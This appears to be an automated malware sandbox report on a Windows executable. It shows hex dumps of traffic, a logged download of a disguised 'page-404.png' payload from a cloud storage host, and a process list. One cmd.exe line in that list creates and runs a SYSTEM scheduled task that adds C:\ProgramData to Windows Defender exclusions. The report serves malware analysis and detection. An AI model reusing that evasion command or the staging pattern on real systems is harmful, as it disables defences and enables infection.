7b 69 35 1d 34 a2 34 80 a8 79
                                                                                                              Data Ascii: ^!_9&J1s>#|NPHz etoON`]vduYq/}|c/%:bOVktuc4BC(jA `5LoI!%Kat2m"r4[lE4ky:8r,?X|=uW62Ac-!s8UbfkeUJ0n{i544y
                                                                                                              2025-01-11 03:43:59 UTC4096INData Raw: b3 17 c8 fb d9 ba 4a 52 9e 19 b6 f2 0c 90 58 f1 c8 82 42 70 91 be fa f9 1e 87 5c 32 5c d9 be eb 70 9d dd 9a a0 fe ba 58 2b 40 8b 87 2f d8 1f 1f 28 3d 5e ce 63 c4 99 3e f8 e3 ad bc 24 77 b7 f7 48 3b 25 73 ae 0f 24 0b ec a3 75 ef ee 53 62 50 5d df 8c b2 3c 14 e6 c8 14 a7 cf c5 e9 4a db 4d d8 2e d8 26 7e 7f 62 aa 90 f6 73 09 0b 2b 06 cd dc ed a9 73 da 0f 11 49 ee 05 1b fb 5f ed 81 8b 07 7a a4 c1 96 fd ee aa 2c b9 6b f2 7e 05 90 09 d1 88 e1 03 55 dd 4c 27 e4 66 e2 c7 9e 4c 95 b9 2e 27 61 ea b1 1b 73 e9 b8 7f 48 f0 ef 88 75 c0 88 d3 ac 39 18 3a 88 23 ea 9b 8c bf f6 15 a3 0c 02 7d b8 b9 d2 bf f7 bb 9d f7 3a 5e ad c8 7f df 59 59 50 45 35 58 55 1a 34 e2 e4 c9 ce 79 ca aa d9 a2 c8 60 37 b5 a1 95 e9 0e ed cf 54 90 0d 93 62 94 c9 9c 68 c6 a4 6e d2 84 c9 ce 27 c8 d1
                                                                                                              Data Ascii: JRXBp\2\pX+@/(=^c>$wH;%s$uSbP]<JM.&~bs+sI_z,k~UL'fL.'asHu9:#}:^YYPE5XU4y`7Tbhn'
                                                                                                              2025-01-11 03:43:59 UTC4096INData Raw: f9 fe d5 7c f4 d3 f1 f3 0a 69 56 c3 f3 77 ac 5b 22 06 46 d8 2a 8b 44 de df 0c bd f8 67 3d ce c6 b2 ba 98 93 9c 1b e3 a6 69 8a f4 10 3c f2 05 cc 33 b0 82 5e b5 e8 9d 69 38 9c 6d 7c 5d 5c e0 d7 6c b5 18 cc 07 12 fb 6d ad 33 b7 ce 56 6e fb 27 9b 4d 3b 1d 1b a6 0b 40 31 dd 1a 92 14 ae 0d 0e 8a 3d db 9e bd ed 8e 11 42 5d cc 85 c4 54 1c 95 f9 57 95 67 32 a1 25 17 66 cf 4b 55 4f 97 79 32 14 bb 22 89 9b 26 fd 5c 2d 05 9d 33 63 4b ad 61 8c 1b 00 4a ab 92 f9 63 37 47 2c 9e e1 0a 8d 10 9b 75 58 81 25 cc 71 4d 08 5a da da ea 7c 1a 00 d0 4e e7 85 84 8b 5d 48 5a 0a ca b9 30 06 19 e4 22 2e 6b 04 99 ce cb f7 89 cb f6 13 c1 94 b5 05 4a 85 c0 9b d3 21 7e 4f ea fa 6a ae d0 4c c1 8c 86 6c a0 98 cd b2 42 88 96 d4 a0 1e 7c 01 66 f1 e7 5c d8 13 28 d0 6f ae 96 fa 4c b4 3f 75 a7
                                                                                                              Data Ascii: |iVw["F*Dg=i<3^i8m|]\lm3Vn'M;@1=B]TWg2%fKUOy2"&\-3cKaJc7G,uX%qMZ|N]HZ0".kJ!~OjLlB|f\(oL?u
                                                                                                              2025-01-11 03:43:59 UTC4096INData Raw: dc c5 62 f2 8c aa 9a 4f ce 3e 97 37 8a ad 9f 49 02 38 d0 3a 49 72 ce 5d e2 69 2a db 55 1b f0 0b c5 ef 3a dc bf 14 5a 9e a7 ca 27 77 3c 23 8e 6e bb 98 c1 da 01 97 f6 74 b5 4f f1 3a 81 f2 e6 a5 9d c6 76 c3 97 80 be 85 db 96 86 0c 7c 6c 07 e1 1a ed 98 2f bd b6 29 a0 f2 ff 4a c3 da 8f 55 54 b7 4b 51 17 7f 33 56 a8 df 0d ee 04 6a b3 2b 29 f0 93 a2 30 5c 2e 53 cc 6b 67 65 bc 9c 12 44 ae 75 e7 80 fe 45 b0 87 7b e5 16 f5 25 aa d4 ba 9f 18 aa 91 cd 57 93 11 ab 3d 75 22 fd c8 08 af 2e b7 fe 7e 7d d6 be 04 c4 cd d5 bd 37 9d 92 f0 bb a7 1f 9a 07 20 ee 36 3e 5c 26 03 e7 b8 03 fa 48 8f 61 16 08 a4 c7 6e 63 37 04 25 80 a8 52 06 b7 bb 1a d9 c2 f4 03 f4 b3 f7 f4 b7 2c 3e 22 6d 3b 5a 26 34 93 6a 6a 8c 33 8e f8 a5 7f 40 d9 25 aa aa 93 35 2f d0 c3 53 48 30 0e 58 fe c7 84 73
                                                                                                              Data Ascii: bO>7I8:Ir]i*U:Z'w<#ntO:v|l/)JUTKQ3Vj+)0\.SkgeDuE{%W=u".~}7 6>\&Hanc7%R,>"m;Z&4jj3@%5/SH0Xs
                                                                                                              2025-01-11 03:43:59 UTC4096INData Raw: c0 70 9d c1 0b f2 f3 a3 ba 3e 88 f1 4d 79 2f 5c c2 1b 26 87 6b 27 35 06 0f b1 e3 60 65 26 77 4d 82 24 e7 b4 0e 9e 25 6c 3d a5 29 a6 61 a7 ad 33 62 d3 73 41 dd 47 1d fb d6 16 b5 2f 32 38 72 12 82 aa 75 51 f2 48 82 31 65 f5 7f 7f 01 b0 2b 42 11 c2 d5 8d 71 89 5b b5 12 ea 71 33 8c d4 a5 36 69 b0 e4 86 2d 07 1e 9b c1 06 80 e9 05 b2 5a 9b e9 46 d8 dd ca f7 c2 7c 3c 7b dd 42 c5 2f 8b f2 7c 5b a1 7a 9d d6 6e c7 12 18 98 fd 68 32 99 c9 55 2a 32 1a 6b 8b e3 e1 33 ef 6f 1c 29 e4 a0 6b 18 39 6a e8 35 9f 8a ac ea 9b 6b 01 5d 4f df fa 7a 3c 39 ae bf 1d 70 b1 c0 f6 8f 62 6d 1a 35 41 7e 96 e0 ea bf 46 72 c7 67 42 99 78 0d 52 50 22 50 d0 23 de 89 41 26 f5 42 f2 74 f8 3d 24 c5 6f d2 33 c1 92 9d a3 bb 99 72 8f 27 63 90 9d ec 7f da 8e 79 18 f2 50 f3 52 b2 42 f4 e0 d0 49 61
                                                                                                              Data Ascii: p>My/\&k'5`e&wM$%l=)a3bsAG/28ruQH1e+Bq[q36i-ZF|<{B/|[znh2U*2k3o)k9j5k]Oz<9pbm5A~FrgBxRP"P#A&Bt=$o3r'cyPRBIa
                                                                                                              2025-01-11 03:43:59 UTC4096INData Raw: 69 26 08 4c 56 a1 2a 49 a9 0b 80 33 53 6f 04 93 b2 75 9d 8a 06 a6 31 4e 22 6a 16 5d 00 d5 36 f8 ac 33 53 50 19 c2 95 81 37 b4 47 a5 a7 f2 ee 2b 1b ca db 4d 59 b8 7c dc 3a 67 c2 63 95 a0 57 01 d3 6a 05 01 15 1f 7f df aa 51 23 11 80 33 00 e5 5d e6 19 c2 8c b6 6b b7 f7 df 59 f2 8c f9 41 24 69 2f ff b3 fd 50 e5 36 d0 ce a7 e2 7d 58 2d 20 b7 a7 9f 9b 94 cd 0e c2 e5 39 ed bc d2 19 1d 15 59 ea 59 42 1a 68 14 50 7d cf 60 91 a9 0d 47 a6 f4 3c 4d 55 f3 2a 7f a8 4f 4e 88 e1 77 cf da 0b c5 73 ae b9 8d f0 45 74 07 59 83 6b 86 5f 9f 3a 76 ec 19 7c 5a 34 cd ae 78 d5 9d fc a6 3b b4 13 5b 1d 84 b2 66 50 02 26 ee dd 1a 42 91 e1 87 36 5d a7 54 a2 39 1b 3d ec ac 80 5a 1c dc 54 aa 13 6f 42 fc 33 94 74 ae 9f 8f 8e 27 68 f9 4c c8 19 d1 54 f2 15 1e 82 8a c7 2f e6 1d 6d 97 22 f8
                                                                                                              Data Ascii: i&LV*I3Sou1N"j]63SP7G+MY|:gcWjQ#3]kYA$i/P6}X- 9YYBhP}`G<MU*ONwsEtYk_:v|Z4x;[fP&B6]T9=ZToB3t'hLT/m"
                                                                                                              2025-01-11 03:43:59 UTC4096INData Raw: 21 50 b7 0e f4 7b 90 de e6 eb d2 21 e8 ae ef b4 0a d8 71 9e 2a 44 fe 1f 3e 71 4d 39 6b 07 91 2d 30 2d 48 27 b6 31 53 5f 58 c2 6e 93 cb ac 81 11 b1 be e8 83 eb 7a 5f 6a 4b 95 34 3d 79 ea 11 c8 89 e1 35 52 73 85 00 70 cb 4c 78 e6 0c 48 26 e0 86 3e 38 0b c6 59 3b e8 61 b7 3b 0c 8b 5c 2d 01 24 8d 26 28 5f 95 d3 91 74 82 da d6 de 87 c2 7e 17 54 71 bc 82 6d d4 28 9a 27 fc 0c bf a8 19 d3 1a 05 a9 3b dc e8 68 c8 b5 38 e1 b9 1a 8d 6d 38 cd 1d 16 d6 b9 89 f0 7b 53 bb 0c 90 b6 f5 a1 14 2b 45 e3 ed 43 8e 61 51 1e 84 55 27 0d 0d e7 26 59 01 77 2c b7 63 00 f7 1c 42 4c 15 44 79 4a c9 94 ea 4a 4e 13 df 27 43 80 e6 8e 4f 91 f9 48 ec 77 81 e0 f8 15 b3 10 31 14 da 87 fb 99 6b 6d c9 7e d6 89 d7 99 79 b5 ec d6 15 76 df 19 04 80 61 c3 54 5d 80 0e 5d ed 9a a7 39 83 ae 15 43 87
                                                                                                              Data Ascii: !P{!q*D>qM9k-0-H'1S_Xnz_jK4=y5RspLxH&>8Y;a;\-$&(_t~Tqm(';h8m8{S+ECaQU'&Yw,cBLDyJJN'COHw1km~yvaT]]9C


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              17192.168.2.849994118.178.60.103443916C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:44:03 UTC128OUTGET /page-404.png HTTP/1.1
                                                                                                              User-Agent: Chrome/114.0.0.0
                                                                                                              Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:44:04 UTC545INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:44:03 GMT
                                                                                                              Content-Type: image/png
                                                                                                              Content-Length: 670784
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E903DC44E03633DD6DEC
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "06C2604A6B2E157543D6812D4F88D743"
                                                                                                              Last-Modified: Sat, 13 Jul 2024 15:18:20 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 8552415919623655984
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: BsJgSmsuFXVD1oEtT4jXQw==
                                                                                                              x-oss-server-time: 1
                                                                                                              2025-01-11 03:44:04 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 e5 a2 42 4a a8 8d 40 ac 73 c6 f9 29 ae 1a 96 f0 c7 c3 4b 00 ce 4e 63 cc f6 6a d8 91 e4 21 90 5c d8 a0 3a 98 21 dc 45 1c 05 ce 4e 7f 01 81 b6 26 e5 3e 00 b5 4d 6e 2a 70 93 f3 af ee 18 75 a1 c9 a0 9e 58 52 06 4c 39 83 94 75 65 f9 b9 74 78 66 41 24 b6 8c fe 7b 34 ca d8 46 76 c3 6a 19 be ba ba d0 ab a1 02 9c 6e cb 3b a5 1f 22 5f be 2c 1f 46 79 be 1d 31 c0 b4 f9 aa b2 c6 86 a2 a8 cf cb c7 f5 f7 15 fe 79 73 c5 68 6d 62 49 6f 48 b5 01 d2 a2 c9 50 85 7f a0 9c e2 3d b3 b3 e0 e5 2e 0c d4 f4 75 9d 3a 2a 9e e2 44 1b e3 cc 11 ae f4 4e b5 b7 80 07 e1 01 9d a3 b8 0c af b7 f5 ba 94
                                                                                                              Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7BJ@s)KNcj!\:!EN&>Mn*puXRL9uetxfA${4Fvjn;"_,Fy1yshmbIoHP=.u:*DN
                                                                                                              2025-01-11 03:44:04 UTC4096INData Raw: f6 ea 55 f5 0b ff 3a 43 4b ef 67 d3 aa bb 38 d2 8e 3f 16 04 ca 0f 54 3b 54 ea d8 36 28 86 5a e4 79 ec df 14 4e 66 83 5c e6 bd f2 87 23 2f 5b 24 ba b5 55 8b 19 71 6f ed 25 99 15 6c 7f 5d ae eb 62 f4 2a 59 0d 0b dc 8a bb 66 4b f4 60 82 71 99 3d 5a c8 07 bf ee 40 f4 3f d4 4f 43 81 ad 5a c1 64 fd 8a db 91 f8 26 e1 fd 79 87 cd 04 71 0a 00 87 41 7f c0 12 9c 8b 2a 2d 7a 16 ca f9 78 39 33 f6 f6 d4 25 53 c0 f1 f2 ba 53 c1 5e ae 72 60 4c 4d cc 83 96 ef 1f 88 fa ec 45 f3 42 bc 73 ca 19 cb 2b 1e b4 d0 a6 69 b5 77 90 67 5b ec f7 65 e6 84 10 6e aa 5c 5a 31 ca af 39 b2 44 6c 0f 9f 90 0c 8b 78 20 22 e5 51 70 57 f9 50 40 fc 5e 86 1c 29 27 48 eb 19 d4 32 e9 f0 fb 40 6c 88 b9 b5 86 a6 d1 53 b3 c4 a1 31 ac 2c 39 9c 9d 6c 6f 7b b9 ab b0 59 dc 80 01 a3 ed da 83 c2 f7 b1 55 ef
                                                                                                              Data Ascii: U:CKg8?T;T6(ZyNf\#/[$Uqo%l]b*YfK`q=Z@?OCZd&yqA*-zx93%SS^r`LMEBs+iwg[en\Z19Dlx "QpWP@^)'H2@lS1,9lo{YU
                                                                                                              2025-01-11 03:44:04 UTC4096INData Raw: 8f 04 05 04 be cb 0a e8 3d 39 72 99 e2 0b e3 c7 aa f1 bc fd f2 37 55 a4 5d 79 39 77 4c 84 95 fa be ca 70 33 b0 fe 32 62 ec 22 d3 3d 6e 6f 29 8a b6 e0 9f ec 51 eb 9a 54 03 6f eb c2 a8 40 06 f2 d7 50 3b fa 72 d5 17 23 d2 b1 93 04 dc 7e 04 41 88 18 15 ff 94 01 51 51 4a 0d 03 fb f6 d6 62 ea 6f a3 34 9e d3 a2 91 a5 c0 cd 7a de 06 73 e8 65 d4 8e 05 86 b6 7f fc 86 04 f0 6f b1 5a f7 cf 54 ba 92 7a c6 bf 6c 27 2f e7 fb 2d 9f a6 4d d5 b0 70 95 c5 67 9f b6 00 ba a4 36 62 02 e5 5b cf 61 9c 09 11 ed fa f5 16 d3 c6 c6 49 2f 96 b5 95 b6 5f 74 87 22 34 11 cf f6 e0 2b 59 b1 23 f8 8b bb 0e 1c 3a 25 31 3f 09 56 17 94 a3 f2 4f 91 e2 f4 ba 79 31 bb 88 4b 33 21 00 c6 87 a4 65 69 61 65 55 e0 4a ca 90 3a 8d 35 29 18 33 ad 87 07 f1 62 7f d8 c3 62 03 1a a7 45 47 54 e0 6e ea a1 90
                                                                                                              Data Ascii: =9r7U]y9wLp32b"=no)QTo@P;r#~AQQJbo4zseoZTzl'/-Mpg6b[aI/_t"4+Y#:%1?VOy1K3!eiaeUJ:5)3bbEGTn
                                                                                                              2025-01-11 03:44:04 UTC4096INData Raw: e5 27 0d 1f aa a3 e3 89 21 a6 60 66 31 de d6 98 71 23 a4 ec ea 23 91 a6 6b 18 b0 58 c2 da b7 ee 8e 04 f0 f5 7b 9a 61 5d 6d 10 f8 2c ce da ca c1 f9 08 3e 96 13 11 80 ab a3 91 47 09 43 06 2f 1d af 05 cf b2 d5 cd 18 64 42 7f 29 7e 4a b9 1b 66 00 25 35 7f b1 36 0e 74 3c a2 66 60 d3 90 aa db 49 2e c1 f8 a3 b9 47 21 0a f6 31 0a 55 de a5 3f d8 b3 9f 1d b9 94 81 ce 24 91 25 9b 30 1f b7 b8 3d 56 86 08 7d 82 8b 4b 27 f7 21 4e 96 5a 5b 76 95 4d 7b f1 e5 97 cb 81 57 6f e4 c5 2e 85 a6 35 2a 3c a8 2f 77 e4 e3 e4 70 98 4b ee 2c 80 53 16 3c aa 64 26 f6 96 8a 1d ae 30 42 e0 da 26 3a 22 c9 58 e7 a0 f7 d8 6f 63 77 c2 41 91 07 5a 96 d3 e3 e9 35 c8 f0 a9 23 40 e4 54 d7 b1 25 ba e3 dd 00 bc bd d7 6c 38 dc 99 af e3 08 78 79 f5 13 10 b0 26 54 ab 58 dc e3 eb 98 09 c5 4e ec a6 4f
                                                                                                              Data Ascii: '!`f1q##kX{a]m,>GC/dB)~Jf%56t<f`I.G!1U?$%0=V}K'!NZ[vM{Wo.5*</wpK,S<d&0B&:"XocwAZ5#@T%l8xy&TXNO
                                                                                                              2025-01-11 03:44:04 UTC4096INData Raw: df af c1 ef ee 65 82 72 bf b0 ec e9 a3 52 27 ee 5f 95 21 ca 46 80 1a 11 a1 d2 58 95 6d 5b d4 1e f3 d4 8e b3 72 c2 bb b1 50 c4 9f f6 38 5a 23 33 e8 70 c8 d0 f1 cc 88 4c cc 1e 9b af d9 54 06 52 e6 bb 10 71 6b bc 4d 8b 7d ea d5 82 86 f7 c2 fd 45 c8 5a b3 be 8a 7a 7c 7b fe 1a 89 df df e5 8f 29 d4 e0 52 77 f2 cb 16 c7 d9 15 6a 08 3b dd bc 8f ad 4e 7f f1 23 fb 74 9a af 32 2f 7e c5 21 ee a6 c8 b6 e2 82 80 2c ce 01 15 32 0a 7b 04 ae 07 21 3f f4 d2 80 8f 79 50 5b 74 10 f1 4d ec 01 3d 1c a9 9a 0a a6 4c 2f 26 1a 12 d4 8d f7 2f 30 a1 12 7c a1 87 89 74 c4 c6 8f de c3 50 38 c6 de a7 87 94 e5 1c 34 98 fb 11 75 1b 3d cc 1d ad d2 b9 76 0a 21 cb 3e 97 65 b8 43 10 31 cc eb 45 38 55 cc 36 af f2 15 79 ac 9a 98 fe 0a 00 66 df 52 28 fb 69 a4 74 d9 2d 34 49 9b 86 24 c2 c9 34 e0
                                                                                                              Data Ascii: erR'_!FXm[rP8Z#3pLTRqkM}EZz|{)Rwj;N#t2/~!,2{!?yP[tM=L/&/0|tP84u=v!>eC1E8U6yfR(it-4I$4
                                                                                                              2025-01-11 03:44:04 UTC4096INData Raw: 1b 1b 6c 89 f7 86 63 6f 3b 4d 6c c3 eb 35 b2 87 b7 5b ad 13 aa 23 81 2d 29 ac 57 53 8b ac 40 d9 b2 60 99 6c 76 1c f3 5c a8 66 d2 2f 45 0d 76 42 64 03 2c e6 64 b6 7c 2f 5d 97 59 ac 4c dd 27 d8 86 53 e5 e2 fe a9 5d 60 0a b6 45 17 ed c4 5d 7d 44 b0 43 c1 08 f8 c0 c0 6a 8a 93 3e fa 01 48 d9 86 e2 ba f2 97 d1 65 bd ff c2 a1 34 86 e3 d0 e0 88 8a a8 5f 7d 9a 59 e8 c3 62 aa 81 54 cd 52 78 af 1c 8f 5f 56 54 33 a9 5c 8a 44 b4 33 80 4b 9f d0 00 7d b5 0b 56 b1 1b ac 7a fa e6 99 09 bb 08 f7 3f 75 7c 6b 68 b3 59 7e 44 b9 ef b3 3e 6f 4a f3 b4 96 f9 63 dd 26 f0 d5 a0 94 87 be 9f 6f 6f 93 2a 20 ea e3 66 0e 81 bd d7 7a 97 b6 23 93 27 dd ca 87 20 e4 58 15 e2 dd 3d 8b 68 bf 7b af 6b 7f 70 ce 50 7b 4d 41 4b b5 6d 7a 38 cc bd 15 7a 1d 6f 1d 61 db c7 72 41 ce 3d 7d f1 f3 41 8e
                                                                                                              Data Ascii: lco;Ml5[#-)WS@`lv\f/EvBd,d|/]YL'S]`E]}DCj>He4_}YbTRx_VT3\D3K}Vz?u|khY~D>oJc&oo* fz#' X=h{kpP{MAKmz8zoarA=}A
                                                                                                              2025-01-11 03:44:04 UTC4096INData Raw: 8c c4 b5 82 6b 09 df bb c1 2c 30 df 82 50 39 d1 9d 95 9f d0 0f b5 e7 49 8c 36 18 0d 93 39 05 b9 d0 e4 af 62 cc ab 5f 7e ac d9 90 f7 f0 3d 8f 84 7c 94 3e bb 7e 7a 0b b9 fd fc ba 2f fb 04 bf 92 34 1c 2f b4 81 41 c0 a4 83 9b 0c 32 39 09 fb b1 09 c3 4c 6c 06 a1 97 52 e5 e3 10 c7 9f f6 96 74 f3 45 8f e6 64 17 d4 02 66 91 91 3f 83 38 49 c2 6c a8 60 3d b3 2c 5f 28 7b 9e 91 f2 97 d2 dd ea 6e 00 0f df 18 33 00 5b 64 31 0e 9d 54 df 1f 0e f7 e0 ce df 73 d8 2e 4f 2f aa 74 58 72 01 ee 72 c7 72 9f 28 94 eb 80 b3 9f b0 e0 4e 54 73 dd e9 a5 80 dc e1 9b 30 d1 49 d1 17 53 df e3 9c b2 fb 19 88 d9 56 9b 5f 0b 37 4d 7b 54 fb e9 17 db e4 c6 34 a1 7e bf a3 bd c9 71 4e 6f eb ee e8 a6 4d 90 c0 91 73 49 e5 75 d3 fb dc 7e ba 13 44 e1 d8 cf e5 a5 1d 9d 70 85 42 e6 0a 80 70 2d b8 7d
                                                                                                              Data Ascii: k,0P9I69b_~=|>~z/4/A29LlRtEdf?8Il`=,_({n3[d1Ts.O/tXrrr(NTs0ISV_7M{T4~qNoMsIu~DpBp-}
                                                                                                              2025-01-11 03:44:04 UTC4096INData Raw: 80 c4 c8 c5 dd 50 ba e4 94 f1 a8 a7 ae 54 6f ff 14 96 ec c2 33 db da 21 9e c8 93 12 85 10 2c df e2 b3 92 cc e6 d4 27 0c ee 1d 3e ff 5c 2d 7f 29 dd ba 3e 5d de 45 b4 31 e2 bb fd 58 02 1d 6c 60 54 ae 52 bd 8b 10 df 0f f3 f6 31 08 d3 8b b2 a4 bb 70 a9 72 35 3b 68 db d1 50 d0 03 79 6a 00 67 57 7b 75 e6 e3 d5 40 fc d2 53 d2 57 3d c9 33 e3 db 54 37 56 87 25 cf fa 60 d0 97 89 3e 53 30 f9 f1 a0 b0 73 28 81 42 c2 91 64 2e ac b8 08 32 33 30 ff 4b 86 25 74 c1 71 82 c8 49 7a 35 09 0f 05 01 2f 40 a2 9a 28 a2 1c aa 3a 99 37 15 7b 2b 1d 8f 7c 82 99 a0 3a 40 ed 62 78 ab af f6 33 63 3e 03 87 00 ea e8 ee f8 16 76 61 d3 46 07 6d f3 f4 4b c6 df ff f5 95 7a e3 92 04 c6 15 b7 79 f8 c2 d7 94 d4 8b f3 7c 3d c3 d2 56 01 2f 1e 0b da b2 5e 8f cc 6e 28 56 e9 17 25 ba 80 b5 36 59 4d
                                                                                                              Data Ascii: PTo3!,'>\-)>]E1Xl`TR1pr5;hPyjgW{u@SW=3T7V%`>S0s(Bd.230K%tqIz5/@(:7{+|:@bx3c>vaFmKzy|=V/^n(V%6YM
                                                                                                              2025-01-11 03:44:04 UTC4096INData Raw: 05 7f 4b 52 2f 62 fa 20 83 8b fb 64 20 05 27 ab 09 b1 77 bf 16 24 c2 62 f5 0c bc 5a 53 23 36 05 dd 55 d4 80 3f 65 96 11 fd 76 aa ec d6 93 bc f0 97 62 21 6a d7 b0 c4 c4 cc e5 ff bc 0f 6f d3 02 99 31 6b 63 af 13 74 ff c9 48 61 1a 38 08 80 d5 a9 0e 2e 61 67 56 37 63 b4 e8 e6 f4 ca 9b 66 bc f7 96 23 79 3b 9e e8 f2 12 79 5f 0c 70 c3 65 c3 d1 22 10 7d 90 dc 8b e9 6d 17 86 38 85 07 7e c1 dd 44 1c bd 4b ef b6 2e e6 1a 8e 77 74 6f f2 80 a7 d7 0e 5a 54 a6 18 a5 be df 6b 42 45 7e 3e 6f ce 8b 02 f8 54 ba 74 31 da 5a d4 7a ee 1a ff 50 2c 0f e8 e7 ad b9 38 3f 45 9e 5e 59 b2 94 b7 cf d8 43 8c fb 45 71 c5 e3 86 75 e6 73 2d 68 92 10 52 3d f1 aa b6 7f c3 72 9e c8 04 e1 66 ef 95 5f a8 17 50 5b 56 2a 4a dd 43 cd 5b 91 97 27 97 49 c9 34 0c ea a6 a1 65 97 60 4c 39 5f ac 4b 18
                                                                                                              Data Ascii: KR/b d 'w$bZS#6U?evb!jo1kctHa8.agV7cf#y;y_pe"}m8~DK.wtoZTkBE~>oTt1ZzP,8?E^YCEqus-hR=rf_P[V*JC['I4e`L9_K
                                                                                                              2025-01-11 03:44:04 UTC4096INData Raw: b8 92 27 e4 10 6e f5 e7 99 91 71 c9 b2 ca 43 b0 64 6d 0a 65 04 68 e4 ac 07 70 05 f4 3e 0b 5e c0 35 6f 56 6c 30 2b 26 72 7c 9a 7c 1b a8 c4 6a 33 87 ab c0 e3 34 00 a7 40 36 2f 1d ac 7f dc 86 60 f2 ce 1e 74 e0 56 2d d6 b4 88 45 65 f4 0a 6e 72 f9 73 7a 9a 6d b8 1e 63 89 56 9b f6 0e 32 61 55 85 d5 26 7c e9 17 b9 2d 77 d7 6f 8d bb 4d 11 be 01 f6 d6 2b 78 ab 42 5d 14 91 ea e0 5f bd 9b 2d 33 de bd 92 a0 38 4d 25 3f 84 6d 78 3c d9 1b 1a 9b c3 24 a3 a6 2d 83 e6 9b 25 ee 2a 40 50 c3 5c 2b f9 1d 2e f6 a8 d3 f8 41 7a f4 c0 26 de 1e 98 00 6f 78 4d e2 7e c8 3a 5a cb 5c 34 40 b3 9f 3d 6a c3 cb 35 dd 7a 0f d5 8e db 1b 04 bc de 1e 43 aa 85 e1 de f4 c0 c3 a2 ce 9c 09 c4 04 1a 67 74 50 f4 7b 3c b6 89 87 5f 59 d3 3a 47 e9 89 e6 7e 38 90 00 e8 e1 19 5d 8e 65 cb db 3f 3e 25 72
                                                                                                              Data Ascii: 'nqCdmehp>^5oVl0+&r||j34@6/`tV-EenrszmcV2aU&|-woM+xB]_-38M%?mx<$-%*@P\+.Az&oxM~:Z\4@=j5zCgtP{<_Y:G~8]e?>%r


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:22:41:33
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\Desktop\2976587-987347589.07.exe"
                                                                                                              Imagebase:0x140000000
                                                                                                              File size:30'887'936 bytes
                                                                                                              MD5 hash:67AB54B4FC69F4175D217DD57154A27C
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:6
                                                                                                              Start time:22:42:34
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              Imagebase:0x140000000
                                                                                                              File size:133'136 bytes
                                                                                                              MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:22:42:36
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              Imagebase:0x140000000
                                                                                                              File size:133'136 bytes
                                                                                                              MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:9
                                                                                                              Start time:22:42:47
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:10
                                                                                                              Start time:22:42:47
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
